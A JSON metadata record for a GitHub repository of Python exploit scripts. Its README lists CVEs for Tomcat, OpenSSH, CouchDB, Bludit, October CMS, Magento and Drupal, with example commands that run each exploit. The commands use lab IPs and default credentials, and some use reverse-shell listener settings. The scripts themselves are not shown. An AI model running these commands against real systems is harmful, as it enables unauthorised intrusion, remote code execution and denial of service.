{"id":19237231,"url":"https://github.com/cocomelonc/vulnexipy","last_synced_at":"2025-10-09T13:35:24.008Z","repository":{"id":42650373,"uuid":"272598978","full_name":"cocomelonc/vulnexipy","owner":"cocomelonc","description":"Vulnerabilities exploitation examples, python","archived":false,"fork":false,"pushed_at":"2023-05-22T23:31:19.000Z","size":54669,"stargazers_count":20,"open_issues_count":2,"forks_count":6,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-21T05:42:32.916Z","etag":null,"topics":["cve-2009-3548","cve-2018-1133","cve-2020-10977","cve-2020-12720","cve-2020-7384","cve-2020-8813","exploit-development","exploitation","rce"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cocomelonc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-06-16T03:17:33.000Z","updated_at":"2025-04-07T15:28:36.000Z","dependencies_parsed_at":"2025-04-21T05:46:38.408Z","dependency_job_id":null,"html_url":"https://github.com/cocomelonc/vulnexipy","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/cocomelonc/vulnexipy","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fvulnexipy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fvulnexipy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fvulnexipy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fvulnexipy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cocomelonc","download_url":"https://codeload.github.com/cocomelonc/vulnexipy/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fvulnexipy/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279001480,"owners_count":26083102,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-09T02:00:07.460Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2009-3548","cve-2018-1133","cve-2020-10977","cve-2020-12720","cve-2020-7384","cve-2020-8813","exploit-development","exploitation","rce"],"created_at":"2024-11-09T16:25:33.623Z","updated_at":"2025-10-09T13:35:23.976Z","avatar_url":"https://github.com/cocomelonc.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# vulnexipy\n\n**Vulnerabilities exploitation examples**\n\n## Examples\n\n1. clone the repository\n\n```bash\ngit clone https://github.com/cocomelonc/vulnexipy\n```\n\n2. go to the dir:\n```bash\ncd vulnexipy\n```\n\n3. run python exploit, for example:\n```bash\npython3 cve_2009_3548.py -u http://172.16.64.101:8080/ -U tomcat -P s3cret -i 172.16.64.10 -p 4444\n```\n\nCVE-2016-6210 - sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.\n\n```bash\npython cve_2016_6210.py --target 10.10.6.17 --usernames users.txt\n```\nCVE-2016-6515 - The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string. \n\n```bash\npython cve_2016_6515.py --target 10.10.6.13 --username root\n```\n\nCVE-2017-12635 - Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit '_users' documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users.\n```bash\npython cve_2017_12635 --target 10.10.6.14 -u couchdb -p mysuperpswd\n```\n\nCVE-2019-16113 - Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.\n\n```bash\npython cve_2019_16113.py --url 10.10.6.15 --username admin --password admin --cmd whoami\n```\n\nCVE-2017-1000119 - October CMS build 412 is vulnerable to PHP code execution in the file upload functionality resulting in site compromise and possibly other applications on the server.\n\n```bash\npython cve_2017_1000119.py --url http://10.10.6.16 -user admin -pswd admin -lhost 10.10.14.16 -lport 4444\n```\n\nMagento Community Edition \u003c 1.9.0.1 - Authenticated Remote Code Execution\n```bash\npython magento_auth_rce.py --url http://10.10.10.112 --user admin --pswd admin\n```\n\nCVE-2018-7600 - Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n```bash\npython cve_2018_7600.py --url http://10.10.10.151 --cmd whoami\n```\n\n**This tool is a Proof of Concept and is for Educational Purposes Only!!!**\n**Author takes no responsibility of any damage you cause**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fvulnexipy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcocomelonc%2Fvulnexipy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fvulnexipy/lists"}